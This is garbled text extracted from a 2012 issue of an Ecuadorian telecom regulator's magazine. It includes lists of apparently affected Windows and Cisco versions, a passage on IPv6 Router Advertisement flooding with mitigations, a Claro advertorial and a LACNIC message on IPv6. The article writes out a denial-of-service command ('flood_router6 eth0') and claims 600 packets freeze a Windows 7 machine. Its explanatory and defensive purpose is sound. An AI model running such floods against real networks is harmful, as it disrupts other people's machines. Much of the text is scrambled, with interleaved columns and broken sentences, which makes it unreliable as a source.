Microsoft Windows Server 2008 SP2 Beta Microsoft Windows Server 2003 x64 SP2 Microsoft Windows Server 2003 x64 SP1 Microsoft Windows Server 2003 Web Edition SP2 Microsoft Windows Server 2003 Web Edition SP1 Beta 1 Microsoft Windows Server 2003 Web Edition SP1 Microsoft Windows Server 2003 Web Edition Microsoft Windows Server 2003 Standard x64 Edition Microsoft Windows Edition SP2 Microsoft Windows Edition SP1 Beta 1 Microsoft Windows Edition SP1 Microsoft Edition Windows Server Server Server Server 2003 2003 2003 2003 Standard Standard Standard Standard
Microsoft Windows Server Edition - Gold Enterprise Microsoft Windows Server Edition - Gold Datacenter Microsoft Windows Edition - Gold Server
Microsoft Windows Server 2008 R2 x64 0 Microsoft Windows Server 2008 R2 Itanium 0 Microsoft Windows Server 2008 R2 Datacenter 0 Microsoft Windows Server 2008 for x64-based Systems SP2 Microsoft Windows Server 2008 for x64-based Systems R2 Microsoft Windows Server 2008 for x64-based Systems 0 Microsoft Windows Server 2008 for Itaniumbased Systems SP2
Microsoft Windows Server 2003 R2 web Edition 0 Microsoft Windows Server 2003 R2 Standard
EDICIN N 14 | 41
A CTUA LIDAD
Edition 0 Microsoft Windows Server 2003 R2 Enterprise Edition SP2 0 Microsoft Windows Server 2003 R2 Enterprise Edition SP1 0 Microsoft Windows Server 2003 R2 Enterprise Edition 0 Microsoft Windows Server 2003 R2 Datacenter Edition SP2 0 Microsoft Windows Server 2003 R2 Datacenter Edition SP1 0 Microsoft Windows Server 2003 R2 Datacenter Edition 0 Microsoft Windows Server 2003 Itanium SP2 Microsoft Windows Server 2003 Itanium SP1 Microsoft Windows Server 2003 Itanium 0 Microsoft Windows Server 2003 Enterprise x64 Edition SP2 Microsoft Windows Server 2003 Enterprise x64 Edition Microsoft Windows Server 2003 Edition Itanium Sp2 Itanium Microsoft Windows Server Edition Itanium SP2 2003 Enterprise Enterprise Enterprise Enterprise Enterprise Enterprise Enterprise Enterprise Edition Itanium SP1 Microsoft Windows Edition Itanium 0 Server 2003 2003 2003 2003 Datacenter Datacenter Datacenter Datacenter
Microsoft Windows Server Edition SP1 Beta 1 Microsoft Windows Edition SP1 Microsoft Edition Windows Server Server
Microsoft Windows Server 2003 Sp2 Storage Microsoft Windows Server 2003 Sp2 Enterprise Microsoft Windows Server 2003 Sp2 Datacenter Microsoft Windows Server 2003 Sp2 Compute Cluster Microsoft Windows Server 2003 SP2 Microsoft Windows Server 2003 Sp1 Storage Microsoft Windows Server 2003 SP1 Platform SDK Microsoft Windows Server 2003 Sp1 Compute Cluster Microsoft Windows Server 2003 SP1 Microsoft Standard Windows Server Server Server 2003 2003 2003 R2 R2 R2 X64X64X64-
Microsoft Windows Server 2003 Edition Itanium SP1 Beta 1 Microsoft Windows Server Edition Itanium SP1 Microsoft Windows Edition Itanium 0 Server 2003 2003 2003 2003 2003
Microsoft Windows Enterprise Microsoft Windows Datacenter
Microsoft Windows Server 2003 R2 X64 Microsoft Windows Server 2003 R2 Storage Microsoft Windows Server 2003 R2 Standard Microsoft Windows Server 2003 R2 Platfom SDK Microsoft Windows Server 2003 R2 Enterprise Microsoft Windows Server 2003 R2 Datacenter Microsoft Windows Server 2003 R2 Compute Cluster Microsoft Windows Server 2003 R2 Microsoft Standard Windows Server Server 2003 2003 Gold Gold X64X64-
Microsoft Windows Server Edition SP1 Beta 1 Microsoft Windows Edition SP1 Microsoft Edition Windows Server Server
Microsoft Windows Server 2003 Datacenter x64 Edition SP2 Microsoft Windows Server 2003 Datacenter x64 Edition Microsoft Windows Server 2003 Edition Itanium SP1 Beta 1 Microsoft Windows Server 2003 Datacenter Datacenter
Microsoft Windows Enterprise
Microsoft Windows Datacenter
Server
2003
Gold
X64-
Cisco PIX/ASA 8.1(1)1 Cisco PIX/ASA 8.1 Cisco PIX/ASA 8.0(4.9) Cisco PIX/ASA 8.0(4.28) Cisco PIX/ASA 8.0(4)7 Cisco PIX/ASA 8.0(4)6 Cisco PIX/ASA 8.0(4)5 Cisco PIX/ASA 8.0(4)28 Cisco PIX/ASA 8.0(4)25 Cisco PIX/ASA 8.0(4)24 Cisco PIX/ASA 8.0(4)23 Cisco PIX/ASA 8.0(4)22 Cisco PIX/ASA 8.0(4) Cisco PIX/ASA 8.0(3)9 Cisco PIX/ASA 8.0(3)15 Cisco PIX/ASA 8.0(3)14 Cisco PIX/ASA 8.0(3)10 Cisco PIX/ASA 8.0(3) Cisco PIX/ASA 8.0(2)17 Cisco PIX/ASA 8.0(2) Cisco PIX/ASA 8.0 Cisco IOS 15.0M Cisco IOS 15.0M Cisco Ios 15.0(1)XA1 Cisco Ios 15.0(1)XA Cisco IOS 15.0(1)M2 Cisco IOS 15.0(1)M1 Cisco IOS 15.0(1)M1 Cisco IOS 15.0 M Cisco Ios 15.0 Cisco ASA 5500 Appliance 8.2.2 Series Adaptive Adaptive Adaptive Security Security Security
Microsoft Windows Server 2003 Gold X64 Microsoft Windows Server 2003 Gold Storage Microsoft Windows Server 2003 Gold Standard Microsoft Windows Server 2003 Gold Itanium Microsoft Windows Server 2003 Gold Enterprise Microsoft Windows Server 2003 Gold Datacenter Microsoft Windows Server 2003 Gold Compute Cluster Microsoft Windows Server 2003 Gold Microsoft Windows Server 2008 R2 Microsoft Windows 7 XP Mode 0 Microsoft Windows 7 Ultimate 0 Microsoft Windows 7 Starter 0 Microsoft Windows 7 Professional 0 Microsoft Windows 7 Home Premium 0 Microsoft Windows 7 for x64-based Systems 0 Microsoft Systems 0 Windows 7 for Itanium-based
Microsoft Windows 7 for 32-bit Systems 0 Microsoft Windows 7 RC Microsoft Windows 7 beta Microsoft Windows 7 Cisco PIX/ASA 8.1(2.3) Cisco PIX/ASA 8.1(2.19) Cisco PIX/ASA 8.1(2)19 Cisco PIX/ASA 8.1(2)16 Cisco PIX/ASA 8.1(2)15 Cisco PIX/ASA 8.1(2)14 Cisco PIX/ASA 8.1(2)12 Cisco PIX/ASA 8.1(2) Cisco PIX/ASA 8.1(1)5 Cisco PIX/ASA 8.1(1)4 Cisco PIX/ASA 8.1(1)2 Cisco PIX/ASA 8.1(1)13
Cisco ASA 5500 Series Appliance 8.2(3) Cisco ASA 5500 Series Appliance 8.2(2.17)
EDICIN N 14 | 43
A CTUA LIDAD
Cisco ASA 5500 Series Appliance 8.2(2.13) Cisco ASA 5500 Series Appliance 8.2(2.10) Cisco ASA 5500 Series Appliance 8.2(2.1) Cisco ASA 5500 Series Appliance 8.2(2) Cisco ASA 5500 Series Appliance 8.2(1.5) Cisco ASA 5500 Series Appliance 8.2(1.2) Cisco ASA 5500 Series Appliance 8.2(1.16) Cisco ASA 5500 Series Appliance 8.2(1.15) Cisco ASA 5500 Series Appliance 8.2(1.10) Cisco ASA 5500 Appliance 8.2 Series Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Security Security Security Security Security Security Security Security Security Security Security Security Security Security Security Security Security Security Security Security Security Security Cisco ASA 5500 Series Appliance 8.0(5.19) Cisco ASA 5500 Series Appliance 8.0(5.17) Cisco ASA 5500 Series Appliance 8.0(5.15) Cisco ASA 5500 Series Appliance 8.0(5.1) Cisco ASA 5500 Series Appliance 8.0(4.44) Cisco ASA 5500 Series Appliance 8.0(4.38) Cisco ASA 5500 Appliance 8.0 Not Vulnerable: Series Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Adaptive Security Security Security Security Security Security Security
Cisco Ios 15.0(1)XA5
Cisco ASA 5500 Series Appliance 8.1(2.46) Cisco ASA 5500 Series Appliance 8.1(2.45) Cisco ASA 5500 Series Appliance 8.1(2.44) Cisco ASA 5500 Series Appliance 8.1(2.40) Cisco ASA 5500 Series Appliance 8.1(2.39) Cisco ASA 5500 Series Appliance 8.1(2.37) Cisco ASA 5500 Series Appliance 8.1(2.35) Cisco ASA 5500 Series Appliance 8.1(2.29) Cisco ASA 5500 Appliance 8.1 Series
Los sistemas operativos: OpenBSD, Ubuntu y MAC, no son vulnerables a este tipo de ataque pues ignoran los paquetes RA a partir del dcimo paquete que llega.
Como se puede ver esta herramienta nos permite apreciar que existe muchos objetivos vulnerables para este tipo de ataque; segn las pruebas realizadas en la pgina web samsclass se pudo determinar que 600 paquetes RAs son suficientes para que una PC que corre Windows 7 ya sobrepase su capacidad de procesamiento y todos sus procesos comiencen a congelarse. Los sistemas operativos: OpenBSD, Ubuntu y MAC, no son vulnerables a este tipo de ataque pues ignoran los paquetes RA a partir del dcimo paquete que llega. Para iniciar con el ataque solo necesitamos colocar en la consola el siguiente comando:
Cisco ASA 5500 Series Appliance 8.0(5.7) Cisco ASA 5500 Series Appliance 8.0(5.6) Cisco ASA 5500 Series Appliance 8.0(5.2)
@root#flood_router6 eth0
Con esto indicamos que vamos a envar un continuo flujo de paquetes RA con direcciones origen MAC e IPv6 aleatorias hacia la red local. En la figura 7 se puede ver como sube el nivel de utilizacin del CPU de una PC Windows 7 al que se est atacando por medio del envo masivo de paquetes Router Advertisement.
Figura 7. Utilizacin de CPU de PC atacada por medio de envo masivo de paquetes RA
Mitigacin de este tipo de ataque: La forma ms fcil de mitigar este ataque es deshabilitando IPv6, pero esto puede bloquear tambin servicios como HomeGroup o DirectAcces. Otra alternativa es deshabilitar la recepcin de paquetes Router Advertisement; esta es una buena medida para implementar en servidores, pero no es buena idea para los clientes, pues sera necesario la configuracin manual de las direcciones IPv6 en cada uno de ellos. Para deshabilitar la recepcin de paquetes RA que ingresen por la interfaz FastEthernet en los sistemas operativos Windows, se ejecuta el siguiente comando en una consola ejecutada con permisos de administrador:
netsh interface ipv6 set interface Local Area Connection routerdiscovery=disabled
Y en la pestaa mbito/Scope, se va a configurar la direccin IP remota de confianza de la cual se va a permitir el ingreso de paquetes de este tipo. Aqu vamos a reemplazar la direccin fe80::/64, pues esta direccin significa que se permite el ingreso de paquetes ICMPv6 de cualquier PC o dispositivo que enve este tipo de paquete; en vez de esta direccin se debe colocar la direccin de los dispositivos de confianza que tengan permitido el envo de este tipo de paquetes por la red. Aunque esta es la mejor opcin de defensa ante ataques de DoS por medio del envo masivo de paquetes RA, tambin este mecanismo puede ser vulnerado por medio de herramientas de Snnifing para detectar las direcciones IPv6 origen de los dispositivos autorizados para el envo de paquetes RA en la red, y con ello se podr crear paquetes ICMPv6 que clonen esta direccin IP y el ataque pueda ser utilizado nuevamente. Utilizar un switch que tenga el mecanismo RA-Guard. ste tipo de mecanismo sera efectivo si es que no se utiliza en el ataque tcnicas como Fragmentacin y Extensions Headers, pues como se vio anteriormente stas tcnicas pueden vulnerar los filtros que realiza RA-Guard permitiendo que los ataques se sigan realizando.
Usar un firewall personal en cada PC para especificar una direccin IPv6 especfica de la cual se pueden recibir paquetes ICMPv6 confiables, pero este tipo de mitigacin es fcil de evadir. En sistemas operativos Windows se puede editar la regla de recepcin ICMPv6 en el Firewall del sistema, para especificar la direccin IPv6 de confianza de la cual se puede recibir este tipo de paquetes. En la siguiente ventana nos ubicamos en Reglas de entrada, ICMPv6 de entrada, tal como se ve en la siguiente ventana:
EDICIN N 14 | 45
A CTUA LIDAD
Desarrollo de aplicaciones mviles crece aceleradamente en Ecuador
CONECEL S.A. - CLARO
l negocio de llevar tecnologa a un pas implica permanente innovacin, gestin de recursos
denominados smartphones o telfonos inteligentes. Segn los ltimos datos de Tecnologas de la Informacin y la Comunicacin (TIC) presentadas por el Instituto Nacional de Estadsticas y Censos a finales de 2011, el 8,4% de ecuatorianos es decir 522.640 personas poseen un telfono inteligente. Estas cifras responden al
que junto a los diferentes sistemas operativos permiten la utilizacin de gran cantidad de aplicaciones: redes sociales, localizacin, streaming y chat se suman ahora a los tradicionales servicios de correo electrnico y navegacin en internet. La tendencia es clara, el uso de smartphones va en aumento. En sus inicios estos dispositivos estuvieron dirigidos a un mercado de ejecutivos y profesionales que necesitaban sus funciones y herramientas para aumentar la productividad en sus trabajos. Sin embargo, el uso de los telfonos inteligentes en Ecuador se ha
econmicos, buena administracin y compromiso. En Ecuador, CLARO se destaca por sus altas inversiones en los ltimos avances tecnolgicos. El sector de las telecomunicaciones es uno de los campos de mayor desarrollo en el pas, que en la ltima dcada ha evolucionado y crecido a pasos acelerados. Ecuador, al igual que el resto de pases de Latinoamrica, es un mercado que est siempre atento a las ltimas tendencias tecnolgicas, con una importante penetracin de los
incremento de uso de datos por parte de los usuarios, que ha sido impulsado por la introduccin de mayor cantidad de marcas y modelos de telfonos inteligentes en el mercado; y por las caractersticas de estos dispositivos
extendido a jvenes, amas de casa, y a toda una variedad de usuarios que buscan aprovechar las herramientas disponibles. Para CLARO, esto ha significado asumir un compromiso empresarial a fin de ofrecer los mejores servicios, liderando el desarrollo de las telecomunicaciones en el pas. CLARO acerca y comunica da a da a ms ecuatorianos, cubriendo el 96% del territorio poblado con la red ms amplia y la ltima tecnologa. La compaa ha entendido el negocio de las telecomunicaciones a travs de la comprensin de las necesidades y percepciones de los usuarios. Por eso ofrece una amplia gama de equipos que satisfacen esas necesidades, acordes a los diferentes estilos de vida de los clientes. Los permanentes recursos
tendencia hacia el consumo de datos va a superar ampliamente al consumo de servicio de voz y es ah donde el uso de los smarthpones o tablets se consolidar de manera definitiva. Uno de los factores clave para que esto ocurra, ser el acceso de los usuarios a los diferentes equipos y planes ofertados en el mercado as como la asignacin de espectro que permita ampliar la capacidad de transmisin de datos de red en el Ecuador. En un inicio la percepcin sobre tener un smartphone significaba un gasto elevado, que CLARO ha sabido comprender y revertir mediante una variada oferta de planes y servicios. As, por ejemplo, los usuarios Banda Ancha Mvil pueden mantenerse conectados a aplicaciones de internet como son las diferentes redes sociales, en todo momento y en cualquier lugar sin que el saldo sea descontado de su plan. Todos estos factores han
no sea solamente una compaa de telefona celular, sino que ha logrado ampliar su oferta de servicios para que los usuarios puedan acceder y disfrutar de una experiencia efectiva y aprovechar al mximo el uso del internet. Al momento, la operadora
ofrece una experiencia de calidad, al contar con ms de 80 modernos centros de atencin a clientes, en los que se destaca el autoservicio que se ha convertido en un modelo innovador para mejorar la forma de atender las necesidades de postventa y contratacin de servicios de los usuarios, reduciendo tiempos de atencin y transaccin sobre el resto de canales. En este sentido, CLARO brinda el nico sistema de cajeros ATM en toda Latinoamrica, lo que es parte de la consolidacin de un buen servicio. Ofrecer los ltimos avances tecnolgicos y tendencias mundiales a los clientes es parte del compromiso y gestin de la empresa, siempre con miras al permanente desarrollo del pas.
econmicos asignados ( desde el ao 2000 ms de $6000 millones) para proveer innovacin, buenos tecnologa, cobertura,
incidido en el crecimiento mutuo logrando mirar a la comunicacin de manera integral, lo que ha permitido que la operadora ya
precios y servicio la han llevado a ser la empresa preferida por los usuarios. Este esfuerzo constante, ha permitido el desarrollo de nuevas aplicaciones basadas en las preferencias de los usurarios, superando las expectativas de los mercados que inicialmente utilizaban solo voz y mensajes de texto. Hoy un buen porcentaje de los clientes CLARO acceden a varios de los servicios de datos. En los prximos aos, segn estudios especializados, se estima que la
EDICIN N 14 | 47
A CTUA LIDAD
para consolidar el crecimiento de Amrica Latina
Ral Echeberra Director Ejecutivo LACNIC
ACNIC llega a Quito para discutir y analizar los temas ms relevantes para el despliegue y estabi-
Desde
su
creacin
como
por hacer, nuevos desafos que atender. El explosivo crecimiento de Internet determin que en el 2011 se terminar el stock central de direcciones IPv4, quedando en nuestra regin direcciones disponibles para menos de 2 aos. Es imprescindible que incorporemos la nueva versin, IPv6, lo que nos permitir mantener y desarrollar Internet e integrar a las casi 600 millones de personas que habitan nuestra regin. No hay suficientes direcciones IPv4 para dar sustento al crecimiento de Internet que se espera en Amrica Latina y el Caribe para los prximos 5 aos. Por eso todos debemos hacer nuestro mayor esfuerzo en el despliegue de IPv6. Pero hay buenas noticias,
registro regional en el 2002, el desafo constante para LACNIC ha sido de estar cada vez ms cerca de nuestra comunidad. Ao tras ao los esfuerzos se han centrado en articular y colaborar permanentemente, promoviendo reuniones tcnicas y polticas en cada rincn del continente, involucrndonos en foros con otras organizaciones, en discusiones regionales, en encuentros en una crecer intergubernamentales, instancias que
lidad de Internet en un momento crucial de Amrica Latina y el Caribe. La regin enfrenta un proceso de crecimiento econmico nico en su historia. Estamos en la dcada de Amrica Latina. Para consolidar esta dcada de crecimiento, necesitamos que Internet se desarrolle an ms y alcance a todos los sectores sociales y econmicos de nuestros pases. Y para que ello ocurra, para que siga habiendo Internet, precisamos desplegar IPv6, la nueva versin de las direcciones IP, que permitir sostener el crecimiento alcanzado. Es para nosotros el ao de IPv6 y con esa premisa llegamos a Ecuador. Con la reunin de Quito
bsqueda permanente de nuevas hagan Internet y su institucionalidad en toda Amrica Latina y el Caribe. Esos esfuerzos han cristalizado con el reconocimiento de LACNIC como entidad de y para la regin, que integra y potencia. Las reuniones de cada ao han ido creciendo en dimensin y complejidad, integrando nuevos temas, actores, grupos de inters. En ellas se han fijado las bases para un desarrollo sostenible de Internet, con mutuos aprendizajes, respetando las particularidades de la regin. Queda mucho
tenemos avances significativos. Ms de 1.000 prefijos de IPv6 han sido asignados a organizaciones de la regin aunque an queda mucho trabajo para hacer. Y la reunin de Quito ser el espaldarazo final que precisa la regin para enfrentar el cambio tecnolgico ms importante que ha habido en Internet en toda su existencia.
llegamos a la edicin nmero XVII de las reuniones de la comunidad de LACNIC, una verdadera plataforma de integracin de Internet para Amrica Latina y el Caribe.

Supertel14 2012

Transféré par

Informations du document

Titre original

Copyright

Formats disponibles

Partager ce document

Partager ou intégrer le document

Options de partage

Avez-vous trouvé ce document utile ?

Ce contenu est-il inapproprié ?

Droits d'auteur :

Formats disponibles

Supertel14 2012

Transféré par

Droits d'auteur :

Formats disponibles

REVISTA INSTITUCIONAL

MENSAJE DEL COMIT ORGANIZADOR

PUNTOSDEINTERCAMBIO DE TRFICO EN EL ECUADOR, NAP.EC

LA SOCIEDAD DE LA INFORMACIN EN EL ECUADOR

DESARROLLO DE APLICACIONES MVILES CRECEACELERADAMENTE EN ECUADOR

Mensaje del Comit Organizador

4 | REVISTA INSTITUCIONAL SUPERTEL

6 | REVISTA INSTITUCIONAL SUPERTEL

8 | REVISTA INSTITUCIONAL SUPERTEL

10 | REVISTA INSTITUCIONAL SUPERTEL

Oferta de servicios soporte de IPv6:

12 | REVISTA INSTITUCIONAL SUPERTEL

Puntos de intercambio de trfico en el Ecuador, NAP.EC

Antecedentes La ASOCIACION DE EMPRESAS PROVEEDORAS DE

14 | REVISTA INSTITUCIONAL SUPERTEL

de Operadores de Puntos de Intercambio de Trfico (LAC-IX); como parte del Directorio se

16 | REVISTA INSTITUCIONAL SUPERTEL

18 | REVISTA INSTITUCIONAL SUPERTEL

Organizador local de la reunin encabezado de por SuperIntendencia

ser actor protagnico en foros

20 | REVISTA INSTITUCIONAL SUPERTEL

La sociedad de la informacin en el Ecuador

22 | REVISTA INSTITUCIONAL SUPERTEL

24 | REVISTA INSTITUCIONAL SUPERTEL

cultural, desarrollar contenidos en

transferencia tecnolgica. Gobierno electrnico, descen-

Vulnerabilidades sobre las tramas y protocolos

26 | REVISTA INSTITUCIONAL SUPERTEL

1999. Proceedings. IEEE International Symposium

talunya, Trabajo Final de Mster

28 | REVISTA INSTITUCIONAL SUPERTEL

Flow Label Hop limit

Payload Length 40 bytes

Next Header Source Address

Cabeceras adicionales Datos (Payload) 32 bytes

Figura 1. Encabezado IP versin 6

Figura 2. Estructura direccin Local nica

30 | REVISTA INSTITUCIONAL SUPERTEL

FF02:0:0:0:0:1:FFFF:FFFF La forma en que se arman estas direcciones es la siguiente:

Figura 3. Direccin Multicast de Nodo Solicitado

32 | REVISTA INSTITUCIONAL SUPERTEL

en paquetes Discovery y Advertisement

34 | REVISTA INSTITUCIONAL SUPERTEL

Paquete RA fraudulento sin fragmentar N=58 Destination Option Header

Primer Fragmento ICMPv6 Router Advertisement

N=44bytes IPv6 Header

Destination Option Header

Paquete RA fraudulento sin fragmentar

Ataques: 1) Ataque a travs de envo de Paquetes de Router Advertising y DHCPv6:

36 | REVISTA INSTITUCIONAL SUPERTEL

{AdvOnLink on;AdvAutonomous on;AdvRouterAddr on;};};

Linux con kernel 2.6 o superior Arquitectura x86 Ethernet

38 | REVISTA INSTITUCIONAL SUPERTEL

40 | REVISTA INSTITUCIONAL SUPERTEL

Microsoft Windows Edition - Sp2 Web

Microsoft Windows Edition SP2

Microsoft Windows Enterprise Microsoft Windows Datacenter

Microsoft Windows Enterprise

42 | REVISTA INSTITUCIONAL SUPERTEL

Microsoft Windows Datacenter

Cisco Ios 15.0(1)XA5

44 | REVISTA INSTITUCIONAL SUPERTEL

Desarrollo de aplicaciones mviles crece aceleradamente en Ecuador